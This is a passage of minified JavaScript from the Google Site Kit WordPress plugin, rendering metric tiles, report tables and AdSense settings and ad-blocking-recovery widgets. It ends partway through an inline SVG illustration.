MetricTileLoader(){return(0,m.jsxs)("div",{className:"googlesitekit-km-widget-tile__loading",children:[(0,m.jsx)(p.A,{className:"googlesitekit-km-widget-tile__loading-header",width:"100%",height:"14px"}),(0,m.jsx)(p.A,{className:"googlesitekit-km-widget-tile__loading-body",width:"100%",height:"53px"})]})}var I=i(60947),h=i(25064),y=i(1641),A=i(13137),M=i(6109),N=i(62659);function MetricTileWrapper(e){const{className:t,children:i,error:a,loading:n,moduleSlug:r,Widget:g,widgetSlug:u,title:p=d.G[u]?.title,infoTooltip:f=d.G[u]?.infoTooltip||d.G[u]?.description}=e,T=(0,N.A)(),S=!!a&&(0,o.castArray)(a).some(A.SG),k=(0,l.useCallback)(()=>{(0,M.sx)(`${T}_kmw`,"data_loading_error_retry")},[T]);return(0,l.useEffect)(()=>{a&&(0,M.sx)(`${T}_kmw`,"data_loading_error")},[T,a]),a?(0,m.jsx)(I.A,{title:S?(0,c.__)("Insufficient permissions","google-site-kit"):(0,c.__)("Data loading failed","google-site-kit"),headerText:p,infoTooltip:f,children:(0,m.jsx)(y.A,{moduleSlug:r,error:a,onRetry:k,GetHelpLink:S?GetHelpLink:void 0,getHelpClassName:"googlesitekit-error-retry-text"})}):(0,m.jsx)(g,{noPadding:!0,children:(0,m.jsxs)("div",{className:s()("googlesitekit-km-widget-tile",t),children:[(0,m.jsx)(h.A,{title:p,infoTooltip:f,loading:n}),(0,m.jsxs)("div",{className:"googlesitekit-km-widget-tile__body",children:[n&&(0,m.jsx)(MetricTileLoader,{}),!n&&i]})]})})}MetricTileWrapper.propTypes={Widget:r().elementType.isRequired,loading:r().bool,title:r().string,infoTooltip:r().oneOfType([r().string,r().element]),moduleSlug:r().string.isRequired}},96574:(e,t,i)=>{"use strict";i.d(t,{A:()=>ReportTable});var a=i(4452),s=i.n(a),o=i(32091),n=i.n(o),r=i(62688),l=i.n(r),c=i(17243),d=i(63696),g=i(49383),u=i(13113),m=i(62540);function ReportTable(e){const{rows:t,columns:i,className:a,limit:o,zeroState:r,gatheringData:l=!1,tabbedLayout:p=!1}=e;n()(Array.isArray(t),"rows must be an array."),n()(Array.isArray(i),"columns must be an array."),i.forEach(({Component:e,field:t=null})=>{n()(e||null!==t,"each column must define a Component and/or a field.")}),n()(Number.isInteger(o)||void 0===o,"limit must be an integer, if provided.");const I=i.some(({badge:e})=>!!e),[h,y]=(0,d.useState)(0),A=p&&i.slice(1),M=p?[i[0],A[h]]:i;return(0,m.jsxs)("div",{className:a,children:[p&&(0,m.jsx)(g.TabBar,{className:"googlesitekit-tab-bar--start-aligned-high-contrast",activeIndex:h,handleActiveIndexUpdate:y,children:A.map(({title:e,badge:t})=>(0,m.jsxs)(g.Tab,{"aria-label":e,children:[e,t]},e))}),(0,m.jsx)("div",{className:s()("googlesitekit-table","googlesitekit-table--with-list",{"googlesitekit-table--gathering-data":l}),children:(0,m.jsxs)("table",{className:s()("googlesitekit-table__wrapper",`googlesitekit-table__wrapper--${M.length}-col`,{"googlesitekit-table__wrapper--tabbed-layout":p}),children:[!p&&(0,m.jsxs)("thead",{className:"googlesitekit-table__head",children:[I&&(0,m.jsx)("tr",{className:"googlesitekit-table__head-badges",children:i.map(({badge:e,primary:t,className:i,columnHeaderClassName:a},o)=>(0,m.jsx)("th",{className:s()("googlesitekit-table__head-item","googlesitekit-table__head-item--badge",{"googlesitekit-table__head-item--primary":t},i,a),children:e},`googlesitekit-table__head-row-badge-${o}`))}),(0,m.jsx)("tr",{className:"googlesitekit-table__head-row",children:i.map(({title:e,description:t,primary:i,className:a,columnHeaderClassName:o},n)=>(0,m.jsx)("th",{className:s()("googlesitekit-table__head-item",{"googlesitekit-table__head-item--primary":i},a,o),"data-tooltip":t,children:e},`googlesitekit-table__head-row-${n}`))})]}),(0,m.jsxs)("tbody",{className:"googlesitekit-table__body",children:[l&&(0,m.jsx)("tr",{className:"googlesitekit-table__body-row googlesitekit-table__body-row--no-data",children:(0,m.jsx)("td",{className:"googlesitekit-table__body-item",colSpan:M.length,children:(0,m.jsx)(u.A,{})})}),!l&&!t?.length&&r&&(0,m.jsx)("tr",{className:"googlesitekit-table__body-row googlesitekit-table__body-row--no-data",children:(0,m.jsx)("td",{className:"googlesitekit-table__body-item",colSpan:M.length,children:(0,m.jsx)(r,{})})}),!l&&t.slice(0,o).map((e,t)=>(0,m.jsx)("tr",{className:"googlesitekit-table__body-row",children:M.map(({Component:t,field:i,className:a},o)=>{const n=void 0!==i?(0,c.get)(e,i):void 0;return(0,m.jsx)("td",{className:s()("googlesitekit-table__body-item",a),children:(0,m.jsxs)("div",{className:"googlesitekit-table__body-item-content",children:[t&&(0,m.jsx)(t,{row:e,fieldValue:n}),!t&&n]})},`googlesitekit-table__body-item-${o}`)})},`googlesitekit-table__body-row-${t}`))]})]})})]})}ReportTable.propTypes={rows:l().arrayOf(l().oneOfType([l().array,l().object])).isRequired,columns:l().arrayOf(l().shape({title:l().string,description:l().string,primary:l().bool,className:l().string,field:l().string,Component:l().elementType,badge:l().node})).isRequired,className:l().string,limit:l().number,zeroState:l().func,gatheringData:l().bool,tabbedLayout:l().bool}},96785:(e,t,i)=>{"use strict";var a=i(50539),s=i.n(a),o=i(13620),n=i.n(o),r=i(88176),l=i.n(r),c=i(46935),d=i.n(c),g=i(82871),u=i(82286),m=i(69908),p=i(99162),I=i(63696),h=i(13606),y=i(5855),A=i(55103),M=i(70301),N=i(29785),f=i(85097),T=i(62659),S=i(6109),k=i(35952),j=i(17243);function v(e,t){if(void 0===e)return;const{rows:i,totals:a}=e||{};return!i?.length||(!a?.cells?.length||0===+a.cells[t]?.value)}var b=i(5704),_=i(4452),x=i.n(_);function C({year:e=0,month:t=1,day:i=0}={}){return new Date(e,t-1,i)}var D=i(68728),E=i(9577),w=i(21620);function Z(e){const t=new URL(e),{domain:i}=(0,w.qg)(t.hostname);return i}var R=i(89065),L=i(25797),G=i(62540);function AdBlockingRecoverySetupCTANotice(){const e=(0,f.W)(),t=(0,T.A)(),i=(0,a.useSelect)(e=>e(k.wl).getAdBlockingRecoverySetupStatus()),s=(0,a.useSelect)(e=>e(k.wl).getAccountStatus()),o=(0,a.useSelect)(e=>e(k.wl).getSiteStatus()),n=(0,a.useSelect)(e=>e(k.wl).hasExistingAdBlockingRecoveryTag()),r=(0,a.useSelect)(e=>e(N.O4).getAdminURL("googlesitekit-ad-blocking-recovery")),l=(0,a.useSelect)(e=>e(M.M).isNavigatingTo(r)),{navigateTo:c}=(0,a.useDispatch)(M.M),d=void 0===n||n||""!==i||s!==D.pJ||o!==D.TF;return(0,I.useEffect)(()=>{e&&!d&&(0,S.sx)(`${t}_adsense-abr-cta-widget`,"view_notification")},[e,d,t]),d?null:(0,G.jsx)(L.A,{type:L.A.TYPES.INFO,title:(0,G.jsxs)(I.Fragment,{children:[(0,g.__)("Ad blocking recovery","google-site-kit"),(0,G.jsx)(y.A,{className:"googlesitekit-new-badge",label:(0,g.__)("New","google-site-kit")})]}),description:(0,h.A)((0,g.__)("Start recovering revenue lost from ad blockers by deploying an ad blocking recovery message through Site Kit. <a>Learn more</a>","google-site-kit"),{a:(0,G.jsx)(A.A,{path:"/adsense/answer/11576589",onClick:function(){(0,S.sx)(`${t}_adsense-abr-cta-widget`,"click_learn_more_link")},external:!0})}),ctaButton:{label:(0,g.__)("Set up now","google-site-kit"),onClick:async function(){return await(0,S.sx)(`${t}_adsense-abr-cta-widget`,"confirm_notification"),c(r)},isSaving:l,disabled:l},children:(0,G.jsx)(R.A,{triggerID:"view_abr_setup_cta",ttl:S.tt})})}var z=i(15844),O=i(49383),P=i(38432),B=i(83880),U=i(11999),W=i(68832);function AdBlockingRecoveryToggle(){const e=(0,T.A)(),t=(0,a.useSelect)(e=>e(k.wl).getUseAdBlockingRecoverySnippet()),i=(0,a.useSelect)(e=>e(k.wl).getUseAdBlockingRecoveryErrorSnippet()),s=(0,a.useSelect)(e=>e(k.wl).getAdBlockingRecoverySetupStatus()),o=(0,a.useSelect)(e=>e(k.wl).getExistingAdBlockingRecoveryTag()),n=(0,a.useSelect)(e=>e(k.wl).getAccountID()),r=(0,a.useSelect)(e=>e(k.wl).getServiceURL({path:`/${n}/privacymessaging/ad_blocking`})),l=(0,a.useSelect)(e=>e(N.O4).getDocumentationLinkURL("ad-blocking-recovery")),c=(0,W.A)(k.RR,"adBlockingRecoveryToggle"),d=(0,W.A)(k.RR,"adBlockingRecoveryErrorToggle"),{setValues:u}=(0,a.useDispatch)(U.s),{setUseAdBlockingRecoverySnippet:m,setUseAdBlockingRecoveryErrorSnippet:p}=(0,a.useDispatch)(k.wl);let I;return(0,z.A)(()=>{const e={adBlockingRecoveryToggle:t,adBlockingRecoveryErrorToggle:i};u(k.RR,e)}),o&&o===n?I=(0,g.__)("You’ve already enabled an ad blocking recovery message on your site. We recommend using Site Kit to manage this to get the most out of AdSense.","google-site-kit"):o&&(I=(0,g.sprintf)(/* translators: %s: account ID */ /* translators: %s: account ID */ (0,g.__)("Site Kit detected Ad Blocking Recovery code for a different account %s on your site. For a better ad blocking recovery experience, you should remove Ad Blocking Recovery code that’s not linked to this AdSense account.","google-site-kit"),(0,b.v)(o))),s?(0,G.jsxs)("fieldset",{className:"googlesitekit-settings-module__ad-blocking-recovery-toggles",children:[(0,G.jsx)("legend",{className:"googlesitekit-setup-module__text",children:(0,g.__)("Ad blocking recovery","google-site-kit")}),(0,G.jsxs)("div",{className:"googlesitekit-settings-module__meta-items",children:[(0,G.jsxs)("div",{className:"googlesitekit-settings-module__meta-item",children:[(0,G.jsx)(O.Switch,{label:(0,g.__)("Enable ad blocking recovery message","google-site-kit"),checked:c,onClick:function(){const t=!c;u(k.RR,{adBlockingRecoveryToggle:t}),m(t),(0,S.sx)(`${e}_adsense-abr`,t?"enable_tag":"disable_tag","abr_tag")},hideLabel:!1}),(0,G.jsx)(B.A,{children:(0,h.A)((0,g.__)("Identify site visitors that have an ad blocker browser extension installed. These site visitors will see the ad blocking recovery message created in AdSense. <a>Configure your message</a>","google-site-kit"),{a:(0,G.jsx)(P.A,{href:r,external:!0})})})]}),(c||t)&&(0,G.jsxs)("div",{className:"googlesitekit-settings-module__meta-item",children:[(0,G.jsx)(O.Switch,{label:(0,g.__)("Place error protection code","google-site-kit"),checked:d,onClick:function(){const t=!d;u(k.RR,{adBlockingRecoveryErrorToggle:t}),p(t),(0,S.sx)(`${e}_adsense-abr`,t?"enable_tag":"disable_tag","error_protection_tag")},hideLabel:!1}),(0,G.jsx)(B.A,{children:(0,h.A)((0,g.__)("If a site visitor’s ad blocker browser extension blocks the message you create in AdSense, a default, non-customizable ad blocking recovery message will display instead. <a>Learn more</a>","google-site-kit"),{a:(0,G.jsx)(P.A,{href:l,external:!0})})})]})]}),o&&(0,G.jsx)(L.A,{type:L.A.TYPES.INFO,description:I})]}):null}var H=i(58240),V=i(10626);function SettingsForm(){const e=(0,a.useSelect)(e=>e(N.O4).isWebStoriesActive()),t=(0,a.useSelect)(e=>e(k.wl).getClientID()),i=(0,a.useSelect)(e=>e(k.wl).getExistingTag()),s=(0,a.useSelect)(e=>e(k.wl).hasFinishedResolution("getExistingTag"));(0,a.useSelect)(e=>e(k.wl).getExistingAdBlockingRecoveryTag());const o=(0,a.useSelect)(e=>e(k.wl).hasFinishedResolution("getExistingAdBlockingRecoveryTag"));if(!s||!o)return(0,G.jsx)(O.ProgressBar,{});let n,r;i&&i===t?(n=(0,g.__)("You’ve already got an AdSense code on your site for this account, we recommend you use Site Kit to place code to get the most out of AdSense","google-site-kit"),r=n):i?(n=(0,g.sprintf)(/* translators: %s: account ID */ /* translators: %s: account ID */ (0,g.__)("Site Kit detected AdSense code for a different account %s on your site. For a better ads experience, you should remove AdSense code that’s not linked to this AdSense account.","google-site-kit"),(0,b.c)(i)),r=(0,g.__)("Please note that AdSense will not show ads on your website unless you’ve already placed the code","google-site-kit")):r=(0,g.__)("Please note that AdSense will not show ads on your website unless you’ve already placed the code","google-site-kit");return(0,G.jsxs)("div",{className:"googlesitekit-adsense-settings-fields",children:[(0,G.jsx)(H.kg,{}),(0,G.jsx)(H.TZ,{checkedMessage:n,uncheckedMessage:r}),e&&(0,G.jsxs)(I.Fragment,{children:[(0,G.jsx)(V.A,{}),(0,G.jsx)(B.A,{children:(0,h.A)((0,g.__)("This ad unit will be used for your Web Stories. <LearnMoreLink />","google-site-kit"),{LearnMoreLink:(0,G.jsx)(P.A,{href:"https://support.google.com/adsense/answer/10175505#create-an-ad-unit-for-web-stories","aria-label":(0,g.__)("Learn more about Ad Sense Web Stories.","google-site-kit"),external:!0,children:(0,g.__)("Learn more","google-site-kit")})})})]}),(0,G.jsx)(H.Ve,{}),(0,G.jsx)(AdBlockingRecoverySetupCTANotice,{}),(0,G.jsx)(AdBlockingRecoveryToggle,{})]})}function SettingsEdit(){let e;return e=(0,a.useSelect)(e=>e(k.wl).isDoingSubmitChanges())?(0,G.jsx)(O.ProgressBar,{}):(0,G.jsx)(SettingsForm,{}),(0,G.jsx)("div",{className:"googlesitekit-setup-module googlesitekit-setup-module--adsense",children:e})}var Y=i(88273),F=i(58718),Q=i(42340);function SettingsSetupIncomplete(){const e=(0,a.useSelect)(e=>e(k.wl).getAccountStatus()),t=(0,D.DZ)(e),i=(0,a.useSelect)(e=>e(k.wl).getAdminReauthURL()),s=(0,a.useSelect)(e=>e(Y.i)?.getCheckRequirementsError(F.Py));let o,n;return t?( /* translators: %s: link with next step */ o=(0,g.__)("Site Kit has placed AdSense code on your site: %s","google-site-kit"),n=(0,g.__)("check module page","google-site-kit")):( /* translators: %s: link with next step */ o=(0,g.__)("Setup incomplete: %s","google-site-kit"),n=(0,g.__)("continue module setup","google-site-kit")),(0,G.jsxs)(I.Fragment,{children:[(0,G.jsx)("div",{className:"googlesitekit-settings-module__fields-group googlesitekit-settings-module__fields-group--no-border",children:(0,G.jsx)(Q.A,{slug:"adsense"})}),(0,G.jsx)("div",{className:"googlesitekit-settings-module__fields-group-title",children:(0,h.A)((0,g.sprintf)(o,`<a>${n}</a>`),{a:(0,G.jsx)(P.A,{className:"googlesitekit-settings-module__edit-button",href:i,disabled:!!s})})})]})}var J=i(50464),X=i(45454);var q=i(55989),K=i(33052);function SettingsView(){const e=(0,a.useSelect)(e=>e(k.wl).getAccountID()),t=(0,a.useSelect)(e=>e(k.wl).getServiceAccountManageSitesURL()),i=(0,a.useSelect)(e=>e(N.O4).isWebStoriesActive()),s=(0,a.useSelect)(e=>e(k.wl).getWebStoriesAdUnit()),o=(0,a.useSelect)(e=>e(k.wl).getAccountStatus()),n=(0,a.useSelect)(e=>e(k.wl).getUseAdBlockingRecoverySnippet()),r=(0,a.useSelect)(e=>e(k.wl).getUseAdBlockingRecoveryErrorSnippet()),l=(0,a.useSelect)(e=>e(k.wl).getSiteStatus()),c=(0,a.useSelect)(e=>e(k.wl).getUseSnippet()),d=(0,a.useSelect)(e=>e(k.wl).getAdBlockingRecoverySetupStatus()),u=(0,a.useSelect)(e=>e(k.wl).getExistingTag()),m=(0,a.useSelect)(e=>e(k.wl).getClientID()),p=(0,a.useSelect)(e=>e(k.wl).getAutoAdsDisabled()||[]),y=(0,a.useSelect)(t=>t(k.wl).getServiceURL({path:`/${e}/privacymessaging/ad_blocking`})),A=function(e){let t=(0,g.__)("Your site isn’t ready to show ads yet","google-site-kit");switch(e){case D.ZT:t=(0,g.__)("Your account has been approved","google-site-kit");break;case D.pJ:t=(0,g.__)("Your site is ready for ads","google-site-kit");break;case D.X_:case D.iP:t=(0,g.__)("We’re getting your site ready for ads. This usually takes less than a day, but it can sometimes take a bit longer","google-site-kit");break;case D.ze:case D.f8:case D.gV:case D.bF:case D.Yb:t=(0,g.__)("You need to fix some issues before your account is approved. Go to AdSense to find out how to fix it","google-site-kit")}return t}(o),M=function(e){let t="";switch(e){case D.k:case D.dL:t=(0,g.__)("You need to fix some things before your site is ready.","google-site-kit");break;case D.oC:t=(0,g.__)("Your site is getting ready.","google-site-kit");break;case D.TF:t=(0,g.__)("Your site is ready for ads.","google-site-kit");break;case D.um:t=(0,g.__)("Your site is ready, with auto-ads disabled.","google-site-kit")}return t}(l),f=(0,h.A)((0,g.__)("View <VisuallyHidden>site </VisuallyHidden>in AdSense","google-site-kit"),{VisuallyHidden:(0,G.jsx)(q.A,{})}),T=function(e,t,i){let a=(0,g.__)("The AdSense code has not been placed on your site","google-site-kit");return e?a=(0,g.__)("The AdSense code has been placed on your site","google-site-kit"):t&&t===i&&(a=(0,g.__)("The AdSense code has been placed by another plugin or theme","google-site-kit")),a}(c,u,m),S=function(e){let t=(0,g.__)("Ads are currently displayed for all visitors","google-site-kit");return e.includes(X.nk)&&e.includes(X.ru)?t=(0,g.__)("All logged-in users and users who can write posts","google-site-kit"):e.includes(X.nk)?t=X.BN[X.nk]:e.includes(X.ru)&&(t=X.BN[X.ru]),t}(p),j=(0,a.useSelect)(e=>void 0===e(k.wl).getSettings()||void 0===e(k.wl).hasExistingAdBlockingRecoveryTag());return(0,G.jsxs)("div",{className:"googlesitekit-setup-module googlesitekit-setup-module--adsense",children:[(0,G.jsx)(H.kg,{}),(0,G.jsxs)("div",{className:"googlesitekit-settings-module__meta-items",children:[(0,G.jsxs)("div",{className:"googlesitekit-settings-module__meta-item",children:[(0,G.jsx)(K.A,{as:"h5",size:"medium",type:"label",className:"googlesitekit-settings-module__meta-item-type",children:(0,g.__)("Publisher ID","google-site-kit")}),(0,G.jsx)("p",{className:"googlesitekit-settings-module__meta-item-data",children:(0,G.jsx)(J.A,{value:e})})]}),(0,G.jsxs)("div",{className:"googlesitekit-settings-module__meta-item",children:[(0,G.jsx)(K.A,{as:"h5",size:"medium",type:"label",className:"googlesitekit-settings-module__meta-item-type",children:(0,g.__)("Site Status","google-site-kit")}),(0,G.jsxs)("p",{className:"googlesitekit-settings-module__meta-item-data",children:[M+" ",(0,G.jsx)(P.A,{href:t,className:"googlesitekit-settings-module__cta-button",disabled:void 0===t,hideExternalIndicator:void 0===t,external:!0,children:f})]})]})]}),(0,G.jsx)("div",{className:"googlesitekit-settings-module__meta-items",children:(0,G.jsxs)("div",{className:"googlesitekit-settings-module__meta-item",children:[(0,G.jsx)(K.A,{as:"h5",size:"medium",type:"label",className:"googlesitekit-settings-module__meta-item-type",children:(0,g.__)("Account Status","google-site-kit")}),(0,G.jsx)("p",{className:"googlesitekit-settings-module__meta-item-data",children:A})]})}),(0,G.jsx)("div",{className:"googlesitekit-settings-module__meta-items",children:(0,G.jsxs)("div",{className:"googlesitekit-settings-module__meta-item",children:[(0,G.jsx)(K.A,{as:"h5",size:"medium",type:"label",className:"googlesitekit-settings-module__meta-item-type",children:(0,g.__)("AdSense Code","google-site-kit")}),(0,G.jsx)("p",{className:"googlesitekit-settings-module__meta-item-data",children:T})]})}),(0,G.jsx)("div",{className:"googlesitekit-settings-module__meta-items",children:(0,G.jsxs)("div",{className:"googlesitekit-settings-module__meta-item",children:[(0,G.jsx)(K.A,{as:"h5",size:"medium",type:"label",className:"googlesitekit-settings-module__meta-item-type",children:(0,g.__)("Excluded from ads","google-site-kit")}),(0,G.jsx)("p",{className:"googlesitekit-settings-module__meta-item-data",children:S})]})}),i&&(0,G.jsx)("div",{className:"googlesitekit-settings-module__meta-items",children:(0,G.jsxs)("div",{className:"googlesitekit-settings-module__meta-item",children:[(0,G.jsx)(K.A,{as:"h5",size:"medium",type:"label",className:"googlesitekit-settings-module__meta-item-type",children:(0,g.__)("Web Stories Ad Unit","google-site-kit")}),(0,G.jsxs)("p",{className:"googlesitekit-settings-module__meta-item-data",children:[!s&&(0,G.jsx)("span",{children:(0,g.__)("None","google-site-kit")}),s&&(0,G.jsx)(J.A,{value:s})]})]})}),d?.length>0&&(0,G.jsxs)("div",{className:"googlesitekit-settings-module__meta-items",children:[j&&(0,G.jsx)(O.ProgressBar,{verticalSpacing:86,small:!0}),!j&&(0,G.jsxs)("div",{className:"googlesitekit-settings-module__meta-item",children:[(0,G.jsx)(K.A,{as:"h5",size:"medium",type:"label",className:"googlesitekit-settings-module__meta-item-type",children:(0,g.__)("Ad blocking recovery","google-site-kit")}),!n&&(0,G.jsx)("p",{className:"googlesitekit-settings-module__meta-item-data",children:(0,g.__)("Ad blocking recovery message is not placed","google-site-kit")}),n&&(0,G.jsxs)(I.Fragment,{children:[(0,G.jsx)("p",{className:"googlesitekit-settings-module__meta-item-data",children:r?(0,g.__)("Ad blocking recovery message enabled with error protection code","google-site-kit"):(0,g.__)("Ad blocking recovery message enabled without error protection code","google-site-kit")}),(0,G.jsx)("p",{className:"googlesitekit-settings-module__meta-item-data",children:(0,h.A)((0,g.__)("Identify site visitors that have an ad blocker browser extension installed. These site visitors will see the ad blocking recovery message created in AdSense. <a>Configure your message</a>","google-site-kit"),{a:(0,G.jsx)(P.A,{href:y,external:!0})})})]})]})]}),!d?.length&&(0,G.jsxs)(I.Fragment,{children:[j&&(0,G.jsx)(O.ProgressBar,{verticalSpacing:131,small:!0}),!j&&(0,G.jsx)(AdBlockingRecoverySetupCTANotice,{})]})]})}var $=i(62688),ee=i.n($),te=i(23955),ie=i(65385),ae=i(97345);function AdBlockerWarningWidget({Widget:e,WidgetNull:t}){return(0,a.useSelect)(e=>e(ae.oR).isAdBlockerActive())?(0,G.jsx)(e,{noPadding:!0,children:(0,G.jsx)(te.A,{moduleSlug:"adsense"})}):(0,G.jsx)(t,{})}AdBlockerWarningWidget.propTypes={Widget:ee().elementType.isRequired};const se=(0,ie.A)({moduleName:F.Py})(AdBlockerWarningWidget);var oe=i(17443),ne=i(4124),re=i(83891);function AdBlockingRecoverySetupCTAWidget({Widget:e,WidgetNull:t}){const i=(0,ne.A)(),s=(0,f.W)(),o=(0,T.A)(),n={tooltipSlug:k.OT,title:(0,g.__)("You can always set up ad blocking recovery in Settings later","google-site-kit"),dismissLabel:(0,g.__)("Got it","google-site-kit")},r=(0,oe.i)(n),l=(0,a.useSelect)(e=>e(ae.oR).isPromptDismissed(k.OT)),c=(0,a.useSelect)(e=>e(ae.oR).getPromptDismissCount(k.OT)),d=(0,a.useSelect)(e=>e(ae.oR).isDismissingPrompt(k.OT)),u=(0,a.useSelect)(e=>i?null:e(k.wl).getAdBlockingRecoverySetupStatus()),m=(0,a.useSelect)(e=>i?null:e(k.wl).getAccountStatus()),p=(0,a.useSelect)(e=>i?null:e(k.wl).getSetupCompletedTimestamp()),h=(0,a.useSelect)(e=>i?null:e(k.wl).getSiteStatus()),y=(0,a.useSelect)(e=>e(k.wl).hasExistingAdBlockingRecoveryTag()),A=(0,a.useSelect)(e=>e(N.O4).getGoogleSupportURL({path:"/adsense/answer/11576589"})),j=(0,a.useSelect)(e=>e(N.O4).getAdminURL("googlesitekit-ad-blocking-recovery")),v=(0,a.useSelect)(e=>e(ae.oR).getReferenceDate()),{dismissPrompt:b}=(0,a.useDispatch)(ae.oR),{navigateTo:_}=(0,a.useDispatch)(M.M),x=(0,a.useSelect)(e=>j&&e(M.M).isNavigatingTo(j)),C=(0,S.XH)(v).getTime()-1e3*p>=3*S.Du*1e3,E=!i&&!1===y&&!1===l&&!1===d&&""===u&&m===D.pJ&&h===D.TF&&(!p||C);return(0,I.useEffect)(()=>{s&&E&&(0,S.sx)(`${o}_adsense-abr-cta-widget`,"view_notification")},[s,E,o]),E?(0,G.jsxs)(e,{noPadding:!0,children:[s&&E&&(0,G.jsx)(R.A,{triggerID:"view_abr_setup_cta",ttl:S.tt}),(0,G.jsx)(re.A,{className:"googlesitekit-banner--setup-cta",title:(0,g.__)("Recover revenue lost to ad blockers","google-site-kit"),description:(0,G.jsxs)(I.Fragment,{children:[(0,G.jsxs)(B.A,{children:[(0,g.__)("Display a message to give site visitors with an ad blocker the option to allow ads on your site.","google-site-kit")," ",(0,G.jsx)(P.A,{onClick:function(){(0,S.sx)(`${o}_adsense-abr-cta-widget`,"click_learn_more_link")},href:A,external:!0,children:(0,g.__)("Learn more","google-site-kit")})]}),(0,G.jsx)(B.A,{children:(0,g.__)("Publishers see up to 1 in 5 users choose to allow ads once they encounter an ad blocking recovery message*","google-site-kit")})]}),dismissButton:{label:c<2?(0,g.__)("Maybe later","google-site-kit"):(0,g.__)("Don’t show again","google-site-kit"),onClick:async function(){if((0,S.sx)(`${o}_adsense-abr-cta-widget`,"dismiss_notification"),r(),c<2){const e=2*S.Du;await b(k.OT,{expiresInSeconds:e})}else await b(k.OT)}},ctaButton:{label:(0,g.__)("Set up now","google-site-kit"),onClick:async function(){return await(0,S.sx)(`${o}_adsense-abr-cta-widget`,"confirm_notification"),_(j),new Promise(()=>{})},disabled:x},svg:{desktop:"data:image/svg+xml;base64,<svg width="385" height="145" viewBox="0 0 385 145" fill="none" xmlns="http://www.w3.org/2000/svg">
<g clip-path="url(#clip0_1505_4259)">
<path d="M357.374 40.479C311.375 -10.8227 249.277 -3.50264 220.424 9.44189C182.781 26.3293 183.129 55.1697 162.848 67.153C142.566 79.1362 131.949 77.8929 100.126 79.0979C68.303 80.3029 17.3997 96.3398 3.62285 147.366C-10.1539 198.392 16.5402 243.592 63.6878 259.033C110.835 274.474 131.031 244.521 172.453 235.805C213.874 227.088 229.248 246.015 268.4 240.785C355.78 229.113 427.563 118.76 357.374 40.479Z" fill="#B8E6CA"/>
<g filter="url(#filter0_d_1505_4259)">
<rect x="72.0215" y="30.0261" width="190.985" height="130.397" rx="10.4313" fill="white"/>
<rect x="82.376" y="56.3694" width="57.9542" height="93.517" rx="3.91175" fill="#BED4FF"/>
<circle cx="98.1812" cy="72.1751" r="7.90285" fill="#7F9CD4"/>
<path d="M99.0369 86.9144L87.6445 99.0979H135.062L117.819 80.658L105.503 93.8294L99.0369 86.9144Z" fill="#7F9CD4"/>
<rect x="100.816" y="134.08" width="21.0743" height="10.5371" rx="5.26856" fill="#7F9CD4"/>
<path fill-rule="evenodd" clip-rule="evenodd" d="M128.401 119.722C128.401 120.733 127.582 121.552 126.571 121.552H95.8178C94.8069 121.552 93.9873 120.733 93.9873 119.722C93.9873 118.711 94.8069 117.891 95.8178 117.891H126.571C127.582 117.891 128.401 118.711 128.401 119.722Z" fill="#7F9CD4"/>
<path fill-rule="evenodd" clip-rule="evenodd" d="M128.401 126.311C128.401 127.322 127.582 128.142 126.571 128.142H95.8178C94.8069 128.142 93.9873 127.322 93.9873 126.311C93.9873 125.301 94.8069 124.481 95.8178 124.481H126.571C127.582 124.481 128.401 125.301 128.401 126.311Z" fill="#7F9CD4"/>
<path d="M72.0215 40.4575C72.0215 34.6964 76.6918 30.0261 82.4528 30.0261H252.576C258.337 30.0261 263.007 34.6964 263.007 40.4575V45.8318H72.0215V40.4575Z" fill="#EBEEF0"/>
<rect x="79.9238" y="35.2947" width="5.26856" height="5.26856" rx="2.63428" fill="#CBD0D3"/>
<rect x="87.8271" y="35.2947" width="5.26856" height="5.26856" rx="2.63428" fill="#CBD0D3"/>
<rect x="156.01" y="56.3694" width="92.8585" height="31.6114" rx="7.32208" fill="#EBEEF0"/>
<rect x="156.226" y="96.657" width="68.0953" height="8.05429" rx="4.02714" fill="#EBEEF0"/>
<rect x="156.01" y="112.557" width="80.3456" height="4.13608" rx="2.06804" fill="#EBEEF0"/>
<rect x="156.01" y="122.528" width="68.4913" height="4.13608" rx="2.06804" fill="#EBEEF0"/>
<rect x="156.01" y="132.499" width="92.8585" height="4.13608" rx="2.06804" fill="#EBEEF0"/>
</g>
<g filter="url(#filter1_d_1505_4259)">
<circle cx="241.107" cy="35.0973" r="18.9831" fill="#C59539"/>
<path d="M244.925 30.0012C244.429 29.45 242.94 28.3474 240.956 28.3474C238.475 28.3474 236.986 30.0012 236.986 31.6551C236.986 36.2038 244.925 33.6139 244.925 38.2704C244.925 39.9243 243.436 41.5781 240.956 41.5781C238.971 41.5781 237.482 40.4755 236.986 39.9243" stroke="#FFE4B1" stroke-width="1.46442" stroke-linecap="round"/>
<path d="M240.955 25.0398V44.8858" stroke="#FFE4B1" stroke-width="1.46442" stroke-linecap="round"/>
</g>
<g filter="url(#filter2_d_1505_4259)">
<circle cx="200.836" cy="133.945" r="15.322" fill="#C59539"/>
<path d="M203.917 129.832C203.517 129.387 202.315 128.497 200.713 128.497C198.711 128.497 197.51 129.832 197.51 131.167C197.51 134.839 203.917 132.748 203.917 136.507C203.917 137.841 202.716 139.176 200.713 139.176C199.112 139.176 197.91 138.286 197.51 137.841" stroke="#FFE4B1" stroke-width="1.46442" stroke-linecap="round"/>
<path d="M200.713 125.828V141.846" stroke="#FFE4B1" stroke-width="1.46442" stroke-linecap="round"/>
</g>
<g filter="url(#filter3_d_1505_4259)">
<circle cx="169.405" cy="106.908" r="10.9831" fill="#C59539"/>
<path d="M171.614 103.959C171.327 103.64 170.466 103.002 169.318 103.002C167.883 103.002 167.021 103.959 167.021 104.916C167.021 107.548 171.614 106.049 171.614 108.744C171.614 109.701 170.753 110.657 169.318 110.657C168.17 110.657 167.309 110.019 167.021 109.701" stroke="#FFE4B1" stroke-width="1.25521" stroke-linecap="round"/>
<path d="M169.318 101.089V112.571" stroke="#FFE4B1" stroke-width="1.25521" stroke-linecap="round"/>
</g>
<g filter="url(#filter4_d_1505_4259)">
<circle cx="285.288" cy="71.8225" r="10.9831" fill="#C59539"/>
<path d="M287.497 68.8739C287.21 68.5549 286.349 67.917 285.201 67.917C283.765 67.917 282.904 68.8739 282.904 69.8307C282.904 72.4625 287.497 70.964 287.497 73.6582C287.497 74.6151 286.636 75.5719 285.201 75.5719C284.053 75.5719 283.191 74.934 282.904 74.6151" stroke="#FFE4B1" stroke-width="1.25521" stroke-linecap="round"/>
<path d="M285.201 66.0034V77.4858" stroke="#FFE4B1" stroke-width="1.25521" stroke-linecap="round"/>
</g>
</g>
<defs>
